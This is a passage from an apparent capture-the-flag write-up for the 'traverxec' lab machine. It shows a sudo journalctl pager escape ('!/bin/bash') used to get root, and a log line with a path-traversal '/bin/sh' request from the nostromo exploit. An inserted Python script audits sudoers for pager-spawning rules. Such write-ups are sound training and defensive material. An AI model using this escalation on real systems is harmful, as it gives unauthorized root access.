Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
david@traverxec:~/bin$
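As an added defensive check (my own code, not from the writeup), here is a small sudoers audit that flags rules granting binaries which open an interactive pager or editor, the property GTFOBins documents for journalctl and which the escalation below relies on. The sudoers excerpt is constructed from the command server-stats.sh runs; the box's real /etc/sudoers is never shown, and the user names other than david are invented.

```python
import re

# Constructed sudoers excerpt modelled on the command server-stats.sh runs above;
# the writeup never shows the machine's real /etc/sudoers.
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
david   ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
backup  ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
ops     ALL=(root) /usr/bin/less /var/log/syslog
deploy  ALL=(root) NOPASSWD: /usr/bin/uptime
"""

# Binaries that hand the caller an interactive pager or editor (GTFOBins lists
# them under sudo) and, where one exists, the flag that turns the pager off.
PAGER_SPAWNERS = {
    "journalctl": "--no-pager",
    "less": None,
    "more": None,
    "man": None,
    "vi": None,
    "vim": None,
    "nano": None,
}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudoers(text):
    """Parse 'user host=(runas) [TAG:] command' lines; skips comments and Defaults."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "user": m.group("user"),
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd").strip(),
        })
    return rules


def rule_risk(rule):
    """Return a finding for a rule whose command can drop into a shell, else None."""
    argv = rule["cmd"].split()
    if not argv or argv[0] == "ALL":
        return None
    binary = argv[0].rsplit("/", 1)[-1]
    if binary not in PAGER_SPAWNERS:
        return None
    fix = PAGER_SPAWNERS[binary]
    if fix and fix in argv[1:]:
        return None  # pager already disabled on the allowed command line
    hint = f"add {fix} to the allowed command" if fix else "do not grant this binary via sudo"
    who = f"{rule['user']} may run {binary} as {rule['runas']}"
    if rule["nopasswd"]:
        who += " without a password"
    return f"{who}; it opens a pager/editor that can spawn a shell: {hint}"


def audit_sudoers(text):
    return [f for f in map(rule_risk, parse_sudoers(text)) if f]


if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS):
        print("-", finding)
```

journalctl only starts its pager when the output does not fit the terminal, which is why the writeup shrinks the window; putting --no-pager on the sudoers command line removes that path whatever the terminal size.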
Get the ADMIN Shell
So this is the tricky part. I need to shrink my terminal so that I can execute the !/bin/bash command and get root.
First I run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service, which has root privileges. It looks something like this:
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Before executing it, I shrink my terminal window so the output no longer fits and journalctl opens its pager. Then I execute the !/bin/bash command and finally get the root shell and root.txt. After resizing the terminal back to normal, it looks like this:
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2020-04-10 19:50:59 EDT, end at Fri 2020-04-10 19:57:00 EDT. --
Apr 10 19:51:03 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/n
Apr 10 19:51:03 traverxec nhttpd[459]: started
Apr 10 19:51:03 traverxec nhttpd[459]: max. file descriptors = 1040 (cur) / 1040 (max)
Apr 10 19:51:03 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 10 19:51:38 traverxec nhttpd[729]: /../../../../bin/sh sent a bad cgi header
!/bin/bash
root@traverxec:/home/david/bin#
Get root.txt:

root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36[--------------------]0d906
root@traverxec:~#
If you liked my writeup please leave a respect on my Profile
References:
nostromo 1.9.6 - Remote Code Execution (exploits/multiple/remote/47837.py)
Nostromo Directory Traversal Remote Command Execution (exploit/multi/http/nostromo_code_exec)
GTFOBins: journalctl